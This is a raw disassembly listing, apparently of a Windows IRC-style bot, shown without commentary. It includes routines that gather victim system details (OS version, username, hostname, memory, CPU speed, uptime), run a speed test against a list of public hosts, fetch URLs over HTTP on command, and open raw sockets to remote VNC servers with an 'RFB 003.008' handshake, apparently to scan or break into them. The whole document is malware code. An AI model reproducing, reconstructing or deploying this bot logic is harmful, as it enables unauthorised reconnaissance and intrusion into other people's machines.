mov [ebp+var_68], offset aWww_stanford_e ; "www.stanford.edu"
mov [ebp+var_64], offset aWww_verio_com ; "www.verio.com"
mov [ebp+var_60], offset aWww_nocster_co ; "www.nocster.com"
mov [ebp+var_5C], offset aWww_rit_edu ; "www.rit.edu"
mov [ebp+var_58], offset aWww_cogentco_c ; "www.cogentco.com"
mov [ebp+var_54], offset aWww_burst_net ; "www.burst.net"
mov [ebp+var_50], offset aNitro_ucsc_edu ; "nitro.ucsc.edu"
mov [ebp+var_4C], offset aWww_level3_com ; "www.level3.com"
mov [ebp+var_48], offset aWww_above_net ; "www.above.net"
mov [ebp+var_44], offset aWww_easynews_c ; "www.easynews.com"
mov [ebp+var_40], offset aWww_google_com ; "www.google.com"
mov [ebp+var_1C], offset aWww_lib_nthu_e ; "www.lib.nthu.edu.tw"
mov [ebp+var_18], offset aWww_st_lib_kei ; "www.st.lib.keio.ac.jp"
mov [ebp+var_14], offset aWww_d1asia_com ; "www.d1asia.com"
mov [ebp+var_10], offset aWww_nifty_com ; "www.nifty.com"
mov [ebp+var_C], offset aYahoo_co_jp ; "yahoo.co.jp"
mov [ebp+var_8], offset aWww_google_co_ ; "www.google.co.jp"
call sub_41AA04
push [ebp+eax*4+var_3C]
call sub_41AA1E
push 8
mov esi, eax
call sub_41AA04
push [ebp+eax*4+var_3C]
call sub_41AA1E
add esp, 10h
test esi, esi
jz short loc_41ACFC
test eax, eax
jz short loc_41ACF8
lea ebx, [eax+esi]
shr ebx, 1
jmp short loc_41ACFE
; ---------------------------------------------------------------------------
loc_41ACF8: ; CODE XREF: sub_41ABFB+F4�j
mov ebx, esi
jmp short loc_41ACFE
; ---------------------------------------------------------------------------
loc_41ACFC: ; CODE XREF: sub_41ABFB+F0�j
mov ebx, eax
loc_41ACFE: ; CODE XREF: sub_41ABFB+FB�j
; sub_41ABFB+FF�j
push 0Ch
call sub_41AA04
push [ebp+eax*4+var_6C]
call sub_41AA1E
push 0Ch
mov edi, eax
call sub_41AA04
push [ebp+eax*4+var_6C]
call sub_41AA1E
add esp, 10h
test edi, edi
jz short loc_41AD36
test eax, eax
jz short loc_41AD32
lea esi, [eax+edi]
shr esi, 1
jmp short loc_41AD38
; ---------------------------------------------------------------------------
loc_41AD32: ; CODE XREF: sub_41ABFB+12E�j
mov esi, edi
jmp short loc_41AD38
; ---------------------------------------------------------------------------
loc_41AD36: ; CODE XREF: sub_41ABFB+12A�j
mov esi, eax
loc_41AD38: ; CODE XREF: sub_41ABFB+135�j
; sub_41ABFB+139�j
push 6
call sub_41AA04
push [ebp+eax*4+var_1C]
call sub_41AA1E
push 6
mov edi, eax
call sub_41AA04
push [ebp+eax*4+var_1C]
call sub_41AA1E
add esp, 10h
test edi, edi
jz short loc_41AD70
test eax, eax
jz short loc_41AD6C
lea ecx, [eax+edi]
shr ecx, 1
jmp short loc_41AD72
; ---------------------------------------------------------------------------
loc_41AD6C: ; CODE XREF: sub_41ABFB+168�j
mov ecx, edi
jmp short loc_41AD72
; ---------------------------------------------------------------------------
loc_41AD70: ; CODE XREF: sub_41ABFB+164�j
mov ecx, eax
loc_41AD72: ; CODE XREF: sub_41ABFB+16F�j
; sub_41ABFB+173�j
xor eax, eax
test ebx, ebx
jz short loc_41AD7F
mov edi, [ebp+var_4]
mov eax, ebx
jmp short loc_41AD82
; ---------------------------------------------------------------------------
loc_41AD7F: ; CODE XREF: sub_41ABFB+17B�j
push 2
pop edi
loc_41AD82: ; CODE XREF: sub_41ABFB+182�j
test esi, esi
jz short loc_41AD8A
add eax, esi
jmp short loc_41AD8B
; ---------------------------------------------------------------------------
loc_41AD8A: ; CODE XREF: sub_41ABFB+189�j
dec edi
loc_41AD8B: ; CODE XREF: sub_41ABFB+18D�j
test ecx, ecx
jz short loc_41AD93
add eax, ecx
jmp short loc_41AD94
; ---------------------------------------------------------------------------
loc_41AD93: ; CODE XREF: sub_41ABFB+192�j
dec edi
loc_41AD94: ; CODE XREF: sub_41ABFB+196�j
xor edx, edx
div edi
push eax
push ecx
push esi
push ebx
lea eax, [ebp+var_26C]
push offset dword_43A990
push eax
call sub_41C266
push 0
lea eax, [ebp+var_26C]
push [ebp+arg_8]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_409869
lea eax, [ebp+var_26C]
push eax
call sub_415D38
add esp, 30h
pop edi
pop esi
pop ebx
leave
retn
sub_41ABFB endp
; =============== S U B R O U T I N E =======================================
sub_41ADD8 proc near ; CODE XREF: sub_401ACD+257B�p
; sub_401ACD+29CD�p ...
arg_0 = dword ptr 4
push ebx
push ebp
push esi
push edi
call ds:dword_4270B0 ; GetTickCount
xor edx, edx
mov ecx, 3E8h
div ecx
mov ebx, 15180h
xor edx, edx
mov esi, ebx
mov edi, 0E10h
mov ebp, edi
push 3Ch
mov ecx, eax
sub ecx, [esp+14h+arg_0]
mov eax, ecx
div esi
mov esi, edx
xor edx, edx
mov eax, esi
div ebp
pop ebp
mov eax, edx
xor edx, edx
div ebp
xor edx, edx
push eax
mov eax, esi
div edi
xor edx, edx
mov esi, offset dword_4DBC90
push eax
mov eax, ecx
div ebx
push eax
push offset aDdDhDm ; "%dd %dh %dm"
push 32h
push esi
call sub_41C360
add esp, 18h
mov eax, esi
pop edi
pop esi
pop ebp
pop ebx
retn
sub_41ADD8 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41AE41 proc near ; CODE XREF: sub_4172C1+24�p
var_94 = dword ptr -94h
var_90 = dword ptr -90h
var_8C = dword ptr -8Ch
var_84 = dword ptr -84h
push ebp
mov ebp, esp
sub esp, 94h
lea eax, [ebp+var_94]
push esi
push eax
xor esi, esi
mov [ebp+var_94], 94h
call ds:dword_4270D0 ; GetVersionExA
test eax, eax
jz short loc_41AED4
cmp [ebp+var_90], 4
jnz short loc_41AEAA
cmp [ebp+var_8C], esi
jnz short loc_41AE92
cmp [ebp+var_84], 1
jnz short loc_41AE85
push 1
pop esi
loc_41AE85: ; CODE XREF: sub_41AE41+3F�j
cmp [ebp+var_84], 2
jnz short loc_41AED4
push 1
jmp short loc_41AED3
; ---------------------------------------------------------------------------
loc_41AE92: ; CODE XREF: sub_41AE41+36�j
cmp [ebp+var_8C], 0Ah
jnz short loc_41AE9F
loc_41AE9B: ; CODE XREF: sub_41AE41+78�j
push 2
jmp short loc_41AED3
; ---------------------------------------------------------------------------
loc_41AE9F: ; CODE XREF: sub_41AE41+58�j
cmp [ebp+var_8C], 5Ah
jnz short loc_41AED4
jmp short loc_41AEC4
; ---------------------------------------------------------------------------
loc_41AEAA: ; CODE XREF: sub_41AE41+2E�j
cmp [ebp+var_90], 5
jnz short loc_41AED4
cmp [ebp+var_8C], esi
jz short loc_41AE9B
cmp [ebp+var_8C], 1
jnz short loc_41AEC8
loc_41AEC4: ; CODE XREF: sub_41AE41+67�j
push 3
jmp short loc_41AED3
; ---------------------------------------------------------------------------
loc_41AEC8: ; CODE XREF: sub_41AE41+81�j
cmp [ebp+var_8C], 2
jnz short loc_41AED4
push 7
loc_41AED3: ; CODE XREF: sub_41AE41+4F�j
; sub_41AE41+5C�j ...
pop esi
loc_41AED4: ; CODE XREF: sub_41AE41+25�j
; sub_41AE41+4B�j ...
mov eax, esi
pop esi
leave
retn
sub_41AE41 endp
; =============== S U B R O U T I N E =======================================
sub_41AED9 proc near ; CODE XREF: sub_41AF8F+290�p
push ebx
push esi
push edi
mov esi, 0F4240h
loc_41AEE1: ; CODE XREF: sub_41AED9+2F�j
; sub_41AED9+35�j
rdtsc
push 3E8h
mov edi, edx
mov ebx, eax
call ds:dword_427080 ; Sleep
rdtsc
sub eax, ebx
push 0
sbb edx, edi
push esi
push edx
push eax
call sub_41DCB0
mov edi, edx
mov ebx, eax
test edi, edi
ja short loc_41AEE1
jb short loc_41AF10
cmp ebx, esi
ja short loc_41AEE1
loc_41AF10: ; CODE XREF: sub_41AED9+31�j
push 0
push 64h
push edi
push ebx
call sub_41DD20
mov ecx, edx
push 64h
xor edx, edx
mov esi, eax
test ecx, ecx
pop eax
ja short loc_41AF83
jb short loc_41AF2F
cmp esi, 50h
jnb short loc_41AF34
loc_41AF2F: ; CODE XREF: sub_41AED9+4F�j
push 4Bh
xor edx, edx
pop eax
loc_41AF34: ; CODE XREF: sub_41AED9+54�j
test ecx, ecx
ja short loc_41AF83
jb short loc_41AF3F
cmp esi, 47h
jnb short loc_41AF44
loc_41AF3F: ; CODE XREF: sub_41AED9+5F�j
push 42h
xor edx, edx
pop eax
loc_41AF44: ; CODE XREF: sub_41AED9+64�j
test ecx, ecx
ja short loc_41AF83
jb short loc_41AF4F
cmp esi, 37h
jnb short loc_41AF54
loc_41AF4F: ; CODE XREF: sub_41AED9+6F�j
push 32h
xor edx, edx
pop eax
loc_41AF54: ; CODE XREF: sub_41AED9+74�j
test ecx, ecx
ja short loc_41AF83
jb short loc_41AF5F
cmp esi, 26h
jnb short loc_41AF64
loc_41AF5F: ; CODE XREF: sub_41AED9+7F�j
push 21h
xor edx, edx
pop eax
loc_41AF64: ; CODE XREF: sub_41AED9+84�j
test ecx, ecx
ja short loc_41AF83
jb short loc_41AF6F
cmp esi, 1Eh
jnb short loc_41AF74
loc_41AF6F: ; CODE XREF: sub_41AED9+8F�j
push 19h
xor edx, edx
pop eax
loc_41AF74: ; CODE XREF: sub_41AED9+94�j
test ecx, ecx
ja short loc_41AF83
jb short loc_41AF7F
cmp esi, 0Ah
jnb short loc_41AF83
loc_41AF7F: ; CODE XREF: sub_41AED9+9F�j
xor eax, eax
xor edx, edx
loc_41AF83: ; CODE XREF: sub_41AED9+4D�j
; sub_41AED9+5D�j ...
sub eax, esi
sbb edx, ecx
add eax, ebx
adc edx, edi
pop edi
pop esi
pop ebx
retn
sub_41AED9 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41AF8F proc near ; CODE XREF: sub_401ACD+2728�p
var_7E8 = byte ptr -7E8h
var_668 = byte ptr -668h
var_5E8 = byte ptr -5E8h
var_568 = byte ptr -568h
var_4E8 = byte ptr -4E8h
var_3E4 = byte ptr -3E4h
var_2E8 = byte ptr -2E8h
var_25C = word ptr -25Ch
var_25A = byte ptr -25Ah
var_15C = byte ptr -15Ch
var_114 = byte ptr -114h
var_CC = dword ptr -0CCh
var_C8 = dword ptr -0C8h
var_C4 = dword ptr -0C4h
var_C0 = dword ptr -0C0h
var_BC = dword ptr -0BCh
var_B8 = byte ptr -0B8h
var_38 = byte ptr -38h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_18 = byte ptr -18h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 7E8h
push ebx
push esi
lea eax, [ebp+var_CC]
push edi
push eax
mov [ebp+var_4], offset byte_43DB88
mov [ebp+var_CC], 94h
call ds:dword_4270D0 ; GetVersionExA
xor ebx, ebx
cmp [ebp+var_C8], 4
jnz short loc_41B016
cmp [ebp+var_C4], ebx
jnz short loc_41AFF2
cmp [ebp+var_BC], 1
jnz short loc_41AFDC
mov [ebp+var_4], offset a95 ; "95"
loc_41AFDC: ; CODE XREF: sub_41AF8F+44�j
cmp [ebp+var_BC], 2
jnz loc_41B091
mov [ebp+var_4], offset aNt_0 ; "NT"
jmp short loc_41B062
; ---------------------------------------------------------------------------
loc_41AFF2: ; CODE XREF: sub_41AF8F+3B�j
cmp [ebp+var_C4], 0Ah
jnz short loc_41B004
mov [ebp+var_4], offset a98 ; "98"
jmp short loc_41B059
; ---------------------------------------------------------------------------
loc_41B004: ; CODE XREF: sub_41AF8F+6A�j
cmp [ebp+var_C4], 5Ah
jnz short loc_41B052
mov [ebp+var_4], offset aMe_0 ; "ME"
jmp short loc_41B059
; ---------------------------------------------------------------------------
loc_41B016: ; CODE XREF: sub_41AF8F+33�j
cmp [ebp+var_C8], 5
jnz short loc_41B052
cmp [ebp+var_C4], ebx
jnz short loc_41B030
mov [ebp+var_4], offset a2k ; "2K"
jmp short loc_41B059
; ---------------------------------------------------------------------------
loc_41B030: ; CODE XREF: sub_41AF8F+96�j
cmp [ebp+var_C4], 1
jnz short loc_41B042
mov [ebp+var_4], offset aXp ; "XP"
jmp short loc_41B059
; ---------------------------------------------------------------------------
loc_41B042: ; CODE XREF: sub_41AF8F+A8�j
cmp [ebp+var_C4], 2
mov [ebp+var_4], offset a2003 ; "2003"
jz short loc_41B059
loc_41B052: ; CODE XREF: sub_41AF8F+7C�j
; sub_41AF8F+8E�j
mov [ebp+var_4], offset a??? ; "???"
loc_41B059: ; CODE XREF: sub_41AF8F+73�j
; sub_41AF8F+85�j ...
cmp [ebp+var_BC], 2
jnz short loc_41B091
loc_41B062: ; CODE XREF: sub_41AF8F+61�j
cmp [ebp+var_B8], bl
jz short loc_41B091
lea eax, [ebp+var_B8]
push eax
lea eax, [ebp+var_2E8]
push [ebp+var_4]
push offset aSS_5 ; "%s (%s)"
push eax
call sub_41C266
lea eax, [ebp+var_2E8]
add esp, 10h
mov [ebp+var_4], eax
loc_41B091: ; CODE XREF: sub_41AF8F+54�j
; sub_41AF8F+D1�j ...
mov ax, word_4383AC
push 3Fh
mov [ebp+var_25C], ax
pop ecx
xor eax, eax
lea edi, [ebp+var_25A]
rep stosd
stosw
mov eax, dword_4CB8B4
mov [ebp+var_C], 100h
cmp eax, ebx
jz short loc_41B0CA
lea ecx, [ebp+var_C]
push ecx
lea ecx, [ebp+var_25C]
push ecx
call eax ; GetUserNameA
loc_41B0CA: ; CODE XREF: sub_41AF8F+12C�j
push [ebp+arg_4]
call sub_40AA06
pop ecx
push eax
call dword_4CBA14 ; inet_addr
mov [ebp+var_8], eax
push 2
lea eax, [ebp+var_8]
push 4
push eax
call dword_4CB98C ; gethostbyaddr
cmp eax, ebx
jz short loc_41B0F3
push dword ptr [eax]
jmp short loc_41B0F8
; ---------------------------------------------------------------------------
loc_41B0F3: ; CODE XREF: sub_41AF8F+15E�j
push offset aCouldnTResolve ; "couldn't resolve host"
loc_41B0F8: ; CODE XREF: sub_41AF8F+162�j
lea eax, [ebp+var_3E4]
push eax
call sub_41C266
pop ecx
lea eax, [ebp+var_4E8]
pop ecx
push 104h
push eax
call ds:dword_42707C ; GetSystemDirectoryA
lea eax, [ebp+var_114]
push 46h
push eax
push offset aDdMmmYyyy ; "dd:MMM:yyyy"
push ebx
mov esi, 409h
push ebx
push esi
call ds:dword_427110 ; GetDateFormatA
lea eax, [ebp+var_15C]
push 46h
push eax
push offset aHhMmSs ; "HH:mm:ss"
push ebx
push ebx
push esi
call ds:dword_42710C ; GetTimeFormatA
push 20h
lea eax, [ebp+var_38]
push ebx
push eax
call sub_41BF70
add esp, 0Ch
lea eax, [ebp+var_38]
push eax
call ds:dword_42719C ; GlobalMemoryStatus
push ebx
push ebx
lea eax, [ebp+var_18]
push ebx
push eax
lea eax, [ebp+var_4E8]
push eax
call sub_41C3B1
lea eax, [ebp+var_18]
push eax
lea eax, [ebp+var_7E8]
push eax
call sub_416DD9
push 60h
mov esi, eax
pop ecx
lea edi, [ebp+var_7E8]
rep movsd
push 60h
lea esi, [ebp+var_7E8]
pop ecx
lea edi, [ebp+var_668]
rep movsd
push ebx
call sub_41ADD8
add esp, 20h
push eax
lea eax, [ebp+var_15C]
push eax
lea eax, [ebp+var_114]
push eax
lea eax, [ebp+var_25C]
push eax
push [ebp+arg_4]
call sub_40AA06
pop ecx
push eax
lea eax, [ebp+var_3E4]
push eax
lea eax, [ebp+var_4E8]
push eax
lea eax, [ebp+var_5E8]
push [ebp+var_C0]
push [ebp+var_C4]
push [ebp+var_C8]
push [ebp+var_4]
push eax
lea eax, [ebp+var_568]
push eax
mov eax, [ebp+var_2C]
shr eax, 0Ah
push ebx
push eax
call sub_416CC9
pop ecx
pop ecx
push eax
mov eax, [ebp+var_30]
shr eax, 0Ah
push ebx
push eax
call sub_416CC9
pop ecx
pop ecx
push eax
call sub_41AED9
push edx
push eax
push offset dword_43AB9C
push 200h
push [ebp+arg_0]
call sub_41C360
mov eax, [ebp+arg_0]
add esp, 50h
pop edi
pop esi
pop ebx
leave
retn
sub_41AF8F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41B243 proc near ; CODE XREF: sub_401ACD+2756�p
; sub_401ACD+71F5�p
var_8C = byte ptr -8Ch
var_C = byte ptr -0Ch
var_8 = byte ptr -8
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 8Ch
push esi
mov esi, 80h
push esi
lea eax, [ebp+var_8C]
push 0
push eax
call sub_41BF70
add esp, 0Ch
cmp dword_4CBABC, 0
jnz short loc_41B2AF
push 0
lea eax, [ebp+var_8C]
push esi
push eax
lea eax, [ebp+var_C]
push eax
call dword_4CB898 ; InternetGetConnectedStateEx
test eax, eax
jnz short loc_41B298
lea eax, [ebp+var_8C]
push offset aNotConnected ; "Not connected"
push eax
call sub_41C266
pop ecx
pop ecx
loc_41B298: ; CODE XREF: sub_41B243+40�j
test [ebp+var_C], 1
jz short loc_41B2A5
push offset aDialUp ; "Dial-up"
jmp short loc_41B2AA
; ---------------------------------------------------------------------------
loc_41B2A5: ; CODE XREF: sub_41B243+59�j
push offset off_43ACE4
loc_41B2AA: ; CODE XREF: sub_41B243+60�j
lea eax, [ebp+var_8]
jmp short loc_41B2C7
; ---------------------------------------------------------------------------
loc_41B2AF: ; CODE XREF: sub_41B243+28�j
mov esi, offset off_43ACE0
lea eax, [ebp+var_8]
push esi
push eax
call sub_41C266
pop ecx
lea eax, [ebp+var_8C]
pop ecx
push esi
loc_41B2C7: ; CODE XREF: sub_41B243+6A�j
push eax
call sub_41C266
pop ecx
pop ecx
push [ebp+arg_4]
push [ebp+arg_8]
call sub_40AA06
pop ecx
push eax
lea eax, [ebp+var_8C]
push eax
lea eax, [ebp+var_8]
push eax
push offset dword_43AC9C
push 200h
push [ebp+arg_0]
call sub_41C360
mov eax, [ebp+arg_0]
add esp, 1Ch
pop esi
leave
retn
sub_41B243 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41B302 proc near ; DATA XREF: sub_401ACD+757F�o
var_65C = byte ptr -65Ch
var_55C = byte ptr -55Ch
var_35C = dword ptr -35Ch
var_358 = byte ptr -358h
var_2D8 = byte ptr -2D8h
var_258 = byte ptr -258h
var_1D8 = dword ptr -1D8h
var_1D4 = dword ptr -1D4h
var_1D0 = dword ptr -1D0h
var_1C8 = byte ptr -1C8h
var_148 = byte ptr -148h
var_C8 = byte ptr -0C8h
var_48 = dword ptr -48h
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = word ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 65Ch
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
push 65h
mov esi, eax
pop ecx
lea edi, [ebp+var_35C]
rep movsd
push 1
mov edi, 80h
pop esi
xor ebx, ebx
mov [eax+190h], esi
push edi
lea eax, [ebp+var_148]
push ebx
push eax
mov [ebp+var_C], ebx
mov [ebp+var_4], ebx
mov [ebp+var_8], offset dword_43ADD0
call sub_41BF70
push edi
lea eax, [ebp+var_1C8]
push ebx
push eax
call sub_41BF70
push edi
lea eax, [ebp+var_C8]
push ebx
push eax
call sub_41BF70
push 100h
lea eax, [ebp+var_65C]
push ebx
push eax
call sub_41BF70
push 3Ch
lea eax, [ebp+var_48]
pop edi
push edi
push ebx
push eax
call sub_41BF70
add esp, 3Ch
lea eax, [ebp+var_48]
mov [ebp+var_48], edi
mov [ebp+var_34], esi
push eax
lea eax, [ebp+var_358]
push ebx
push eax
mov [ebp+var_28], esi
mov [ebp+var_20], esi
mov [ebp+var_18], esi
call sub_41B9C0
pop ecx
push eax
lea eax, [ebp+var_358]
push eax
call dword_4CB8D0 ; InternetCrackUrlA
test eax, eax
jz loc_41B49C
cmp [ebp+var_34], ebx
jbe short loc_41B3D9
push [ebp+var_34]
lea eax, [ebp+var_148]
push [ebp+var_38]
push eax
call sub_41BFD0
add esp, 0Ch
loc_41B3D9: ; CODE XREF: sub_41B302+C0�j
cmp [ebp+var_28], ebx
movzx esi, [ebp+var_30]
jbe short loc_41B3F7
push [ebp+var_28]
lea eax, [ebp+var_1C8]
push [ebp+var_2C]
push eax
call sub_41BFD0
add esp, 0Ch
loc_41B3F7: ; CODE XREF: sub_41B302+DE�j
cmp [ebp+var_20], ebx
jbe short loc_41B411
push [ebp+var_20]
lea eax, [ebp+var_C8]
push [ebp+var_24]
push eax
call sub_41BFD0
add esp, 0Ch
loc_41B411: ; CODE XREF: sub_41B302+F8�j
cmp [ebp+var_18], ebx
jbe short loc_41B42B
push [ebp+var_18]
lea eax, [ebp+var_65C]
push [ebp+var_1C]
push eax
call sub_41BFD0
add esp, 0Ch
loc_41B42B: ; CODE XREF: sub_41B302+112�j
push ebx
push ebx
lea eax, [ebp+var_C8]
push 3
push eax
lea eax, [ebp+var_1C8]
push eax
lea eax, [ebp+var_148]
push esi
push eax
push dword_4CB984
call dword_4CB9A8 ; InternetConnectA
mov esi, eax
cmp esi, ebx
jz short loc_41B4B4
push ebx
lea eax, [ebp+var_8]
push 200h
push eax
lea eax, [ebp+var_2D8]
push eax
lea eax, [ebp+var_65C]
push ebx
push eax
push ebx
push esi
call dword_4CB99C ; HttpOpenRequestA
cmp eax, ebx
mov [ebp+var_4], eax
jz short loc_41B4BB
push ebx
push ebx
push ebx
push ebx
push eax
call dword_4CB948 ; HttpSendRequestA
test eax, eax
jz short loc_41B495
push offset dword_43ADB4
jmp short loc_41B4C0
; ---------------------------------------------------------------------------
loc_41B495: ; CODE XREF: sub_41B302+18A�j
push offset unk_43AD78
jmp short loc_41B4C0
; ---------------------------------------------------------------------------
loc_41B49C: ; CODE XREF: sub_41B302+B7�j
lea eax, [ebp+var_55C]
push offset dword_43AD5C
push eax
call sub_41C266
mov esi, [ebp+var_C]
pop ecx
pop ecx
jmp short loc_41B4CE
; ---------------------------------------------------------------------------
loc_41B4B4: ; CODE XREF: sub_41B302+153�j
push offset unk_43AD30
jmp short loc_41B4C0
; ---------------------------------------------------------------------------
loc_41B4BB: ; CODE XREF: sub_41B302+17B�j
push offset unk_43AD00
loc_41B4C0: ; CODE XREF: sub_41B302+191�j
; sub_41B302+198�j ...
lea eax, [ebp+var_55C]
push eax
call sub_41C266
pop ecx
pop ecx
loc_41B4CE: ; CODE XREF: sub_41B302+1B0�j
cmp [ebp+var_1D4], ebx
jnz short loc_41B4F9
push ebx
lea eax, [ebp+var_55C]
push [ebp+var_1D0]
push eax
lea eax, [ebp+var_258]
push eax
push [ebp+var_35C]
call sub_409869
add esp, 14h
loc_41B4F9: ; CODE XREF: sub_41B302+1D2�j
lea eax, [ebp+var_55C]
push eax
call sub_415D38
pop ecx
push esi
call dword_4CBA08 ; InternetCloseHandle
push [ebp+var_4]
call dword_4CBA08 ; InternetCloseHandle
push [ebp+var_1D8]
call sub_40B6D6
pop ecx
push ebx
call ds:dword_4270D4 ; ExitThread
pop edi
pop esi
pop ebx
sub_41B302 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_41B52C proc near ; CODE XREF: sub_401ACD+4F59�p
arg_0 = dword ptr 4
push esi
push 100h
mov esi, offset byte_4DBCCC
push 0
push esi
call sub_41BF70
add esp, 0Ch
push [esp+4+arg_0]
push offset aS_8 ; "%s"
push 0FFh
push esi
call sub_41C360
add esp, 10h
pop esi
retn
sub_41B52C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41B55B proc near ; CODE XREF: .text:0041B843�p
; .text:0041B860�p ...
var_14 = byte ptr -14h
var_C = byte ptr -0Ch
var_6 = word ptr -6
var_4 = word ptr -4
var_2 = word ptr -2
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 14h
push esi
push edi
mov esi, offset dword_4DBDD4
lea edi, [ebp+var_C]
mov ax, word_43ADD4
movsd
movsb
mov esi, offset dword_4DBDCC
lea edi, [ebp+var_14]
mov [ebp+var_2], ax
mov ax, word_4346DC
movsd
mov [ebp+var_6], ax
mov ax, word_4CB88C
movsw
mov [ebp+var_4], ax
mov eax, [ebp+arg_8]
xor esi, esi
cmp eax, esi
jnz loc_41B627
mov edi, [ebp+arg_0]
push ebx
mov ebx, [ebp+arg_4]
mov [ebp+arg_8], esi
loc_41B5AD: ; CODE XREF: sub_41B55B+C7�j
mov eax, [ebp+arg_8]
sub eax, esi
jz short loc_41B5CD
dec eax
jnz short loc_41B61B
push esi
lea eax, [ebp+var_2]
push 1
push eax
push edi
call dword_4CBA24 ; send
push esi
push 1
lea eax, [ebp+var_4]
jmp short loc_41B5E1
; ---------------------------------------------------------------------------
loc_41B5CD: ; CODE XREF: sub_41B55B+57�j
push esi
lea eax, [ebp+var_2]
push 1
push eax
push edi
call dword_4CBA24 ; send
push esi
push 1
lea eax, [ebp+var_6]
loc_41B5E1: ; CODE XREF: sub_41B55B+70�j
push eax
push edi
call dword_4CBA24 ; send
push ebx
call sub_41B9C0
pop ecx
cmp eax, 2
push esi
jnz short loc_41B5FD
push 4
lea eax, [ebp+var_C]
jmp short loc_41B602
; ---------------------------------------------------------------------------
loc_41B5FD: ; CODE XREF: sub_41B55B+99�j
push 5
lea eax, [ebp+var_14]
loc_41B602: ; CODE XREF: sub_41B55B+A0�j
push eax
push edi
call dword_4CBA24 ; send
push esi
push ebx
call sub_41B9C0
pop ecx
push eax
push ebx
push edi
call dword_4CBA24 ; send
loc_41B61B: ; CODE XREF: sub_41B55B+5A�j
inc [ebp+arg_8]
cmp [ebp+arg_8], 1
jle short loc_41B5AD
pop ebx
jmp short loc_41B69D
; ---------------------------------------------------------------------------
loc_41B627: ; CODE XREF: sub_41B55B+42�j
dec eax
jz short loc_41B646
dec eax
jnz short loc_41B69D
mov edi, [ebp+arg_0]
push esi
lea eax, [ebp+var_2]
push 1
push eax
push edi
call dword_4CBA24 ; send
push esi
push 1
lea eax, [ebp+var_4]
jmp short loc_41B65D
; ---------------------------------------------------------------------------
loc_41B646: ; CODE XREF: sub_41B55B+CD�j
mov edi, [ebp+arg_0]
push esi
lea eax, [ebp+var_2]
push 1
push eax
push edi
call dword_4CBA24 ; send
push esi
push 1
lea eax, [ebp+var_6]
loc_41B65D: ; CODE XREF: sub_41B55B+E9�j
push eax
push edi
call dword_4CBA24 ; send
push [ebp+arg_4]
call sub_41B9C0
pop ecx
cmp eax, 2
push esi
jnz short loc_41B67B
push 4
lea eax, [ebp+var_C]
jmp short loc_41B680
; ---------------------------------------------------------------------------
loc_41B67B: ; CODE XREF: sub_41B55B+117�j
push 5
lea eax, [ebp+var_14]
loc_41B680: ; CODE XREF: sub_41B55B+11E�j
push eax
push edi
call dword_4CBA24 ; send
push esi
push [ebp+arg_4]
call sub_41B9C0
pop ecx
push eax
push [ebp+arg_4]
push edi
call dword_4CBA24 ; send
loc_41B69D: ; CODE XREF: sub_41B55B+CA�j
; sub_41B55B+D0�j
pop edi
pop esi
leave
retn
sub_41B55B endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 288h
push ebx
push esi
push edi
mov esi, offset aRfb003_008 ; "RFB 003.008\n"
lea edi, [ebp-38h]
mov ax, word_4346DC
movsd
movsd
movsd
movsb
mov esi, offset dword_43ADE8
lea edi, [ebp-1Ch]
movsw
movsb
mov esi, offset dword_4DBDD4
lea edi, [ebp-28h]
movsd
movsb
mov esi, offset dword_43ADE4
lea edi, [ebp-10h]
movsw
movsb
mov esi, offset dword_43ADE0
lea edi, [ebp-14h]
movsw
movsb
mov esi, offset dword_43ADDC
lea edi, [ebp-0Ch]
movsw
movsb
xor esi, esi
mov [ebp-6], ax
mov [ebp-16h], ax
mov ax, word ptr aR ; "r"
push esi
push 1
push 2
mov [ebp-18h], ax
xor edi, edi
call dword_4CBA54 ; socket
mov ebx, eax
cmp ebx, 0FFFFFFFFh
jnz short loc_41B724
push eax
call dword_4CBA6C ; closesocket
loc_41B724: ; CODE XREF: .text:0041B71B�j
lea eax, [ebp+0Ch]
mov word ptr [ebp-48h], 2
push eax
call dword_4CBA14 ; inet_addr
push dword ptr [ebp+0A8h]
mov [ebp-44h], eax
call dword_4CB9D4 ; htons
mov [ebp-46h], ax
lea eax, [ebp-48h]
push 10h
push eax
push ebx
call dword_4CB97C ; connect
test eax, eax
jnz loc_41B820
loc_41B75C: ; CODE XREF: .text:0041B7CE�j
; .text:0041B805�j
push 40h
lea eax, [ebp-88h]
push esi
push eax
call sub_41BF70
add esp, 0Ch
lea eax, [ebp-88h]
push esi
push 40h
push eax
push ebx
call dword_4CB9EC ; recv
cmp eax, esi
jle loc_41B82E
cmp eax, 0FFFFFFFFh
jz loc_41B82E
mov eax, edi
sub eax, esi
jz short loc_41B7D0
dec eax
jz short loc_41B79E
dec eax
jz short loc_41B80A
jmp short loc_41B800
; ---------------------------------------------------------------------------
loc_41B79E: ; CODE XREF: .text:0041B797�j
lea eax, [ebp-1Ch]
push eax
lea eax, [ebp-88h]
push eax
call sub_41CA50
pop ecx
test eax, eax
pop ecx
jnz short loc_41B820
lea eax, [ebp-6]
push esi
push eax
call sub_41B9C0
pop ecx
push eax
lea eax, [ebp-6]
push eax
push ebx
call dword_4CBA24 ; send
push 2
pop edi
jmp short loc_41B75C
; ---------------------------------------------------------------------------
